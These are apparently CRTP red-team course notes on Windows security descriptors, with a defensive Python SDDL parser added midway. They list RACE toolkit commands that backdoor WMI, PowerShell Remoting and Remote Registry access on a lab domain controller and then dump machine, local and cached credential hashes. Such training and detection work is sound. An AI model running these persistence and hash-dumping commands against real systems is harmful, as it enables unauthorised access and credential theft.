Certified Red Team Professional (CRTP) - Notes

8.7.3 - Security Descriptors

Security Descriptors

Security Descriptors define access control for securable objects in Windows (e.g., services, WMI namespaces, registry keys). A descriptor can be written out as text using SDDL (Security Descriptor Definition Language). The DACL part of an SDDL string is a sequence of Access Control Entries (ACEs), each with this structure:

ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid

Example ACE for built-in administrators on WMI namespaces:

A;CI;CCDCLCSWRPWPRCWD;;;SID

Here A means the ACE allows access, CI (container inherit) makes it propagate to child namespaces, the rights string grants full control over the namespace, the two GUID fields are empty, and SID is the trustee (BA for built-in administrators). This ACE therefore grants administrators full control over WMI resources.


Using RACE Toolkit for Security Descriptor Abuse

You can abuse security descriptors to grant non-admin users access to protected resources. The RACE toolkit simplifies this process:

Load the toolkit:

. C:\AD\Tools\RACE-master\RACE.ps1

Modify WMI Security Descriptors

  • On the local machine:

Set-RemoteWMI -SamAccountName student1 -Verbose
  • On a remote machine, using the current user's credentials:

Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
  • On a remote machine with credentials:

Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose
  • To remove permissions from the remote machine:

Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose
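To see from the defender's side what the ACE format above and a Set-RemoteWMI-style change to a namespace descriptor look like, here is an added example (not part of these notes and not code from the RACE toolkit): a small Python SDDL DACL parser that decodes the rights letters with their WMI namespace meanings and flags allow ACEs that grant sensitive rights (Full Write, Remote Enable, Edit Security) to trustees outside the expected administrator set. The sample SDDL string, its per-user SID and the baseline trustee set are constructed for the example.

```python
import re
from collections import namedtuple

# SDDL right letters -> access-mask bits, labelled with what those bits mean on a
# WMI namespace (WMI reuses the generic SDDL letters with its own meanings).
WMI_RIGHTS = {
    "CC": (0x00001, "Enable Account"),
    "DC": (0x00002, "Execute Methods"),
    "LC": (0x00004, "Full Write"),
    "SW": (0x00008, "Partial Write"),
    "RP": (0x00010, "Provider Write"),
    "WP": (0x00020, "Remote Enable"),
    "RC": (0x20000, "Read Security"),
    "WD": (0x40000, "Edit Security"),
}
SENSITIVE = {"Full Write", "Remote Enable", "Edit Security"}
BASELINE_TRUSTEES = {"BA", "SY"}   # assumed legitimate holders of elevated rights

Ace = namedtuple("Ace", "ace_type flags rights trustee")

# Constructed sample: a root\cimv2-style DACL holding the administrators ACE from the
# notes plus an extra per-user ACE with a made-up SID, the shape a Set-RemoteWMI change leaves.
SAMPLE_SDDL = ("O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;BA)(A;CI;CCDCRP;;;NS)(A;CI;CCDCRP;;;LS)"
               "(A;CI;CCDCRP;;;AU)(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-1111-2222-3333-1105)")

def rights_mask(field):
    """Convert the SDDL rights field (letter pairs or a hex mask) into an access mask."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for pair in (field[i:i + 2] for i in range(0, len(field), 2)):
        mask |= WMI_RIGHTS[pair][0]        # an unknown pair raises KeyError on purpose
    return mask

def parse_dacl(sddl):
    """Return the DACL ACEs of an SDDL string, rights decoded to WMI permission names."""
    m = re.search(r"D:[^(]*((?:\([^)]*\))+)", sddl)
    aces = []
    for body in (re.findall(r"\(([^)]*)\)", m.group(1)) if m else []):
        ace_type, flags, rights, _obj, _inh_obj, sid = body.split(";")
        mask = rights_mask(rights)
        aces.append(Ace(ace_type, flags,
                        frozenset(n for bit, n in WMI_RIGHTS.values() if mask & bit), sid))
    return aces

def find_suspicious_aces(sddl, baseline=BASELINE_TRUSTEES):
    """Allow ACEs granting sensitive namespace rights to trustees outside the baseline."""
    return [a for a in parse_dacl(sddl)
            if a.ace_type == "A" and a.trustee not in baseline and a.rights & SENSITIVE]
```

Running find_suspicious_aces(SAMPLE_SDDL) returns only the per-user entry, since NS, LS and AU hold just Enable Account, Execute Methods and Provider Write; on a live host the SDDL would come from the namespace's __SystemSecurity descriptor rather than the constructed string.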

Persistence via PowerShell Remoting Descriptors

Note: PS Remoting backdoors via ACLs became unstable after August 2020 patches.

  • 🔸 On the local machine:

Set-RemotePSRemoting -SamAccountName student1 -Verbose
  • 🔸 On a remote machine:

Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Verbose
  • 🔸 To remove remoting access:

Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Remove

Persistence via Remote Registry Descriptors

Using RACE or DAMP, you can grant registry access to users and retrieve sensitive hashes:

  • 🔸 Add a backdoor via Remote Registry:

Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose
  • 🔸 As student1, dump the machine account hash:

Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
  • 🔸 Retrieve local account hashes:

Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
  • 🔸 Retrieve domain cached credentials:

Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose

Labs

Learning Object 13 lab

Last updated 2 days ago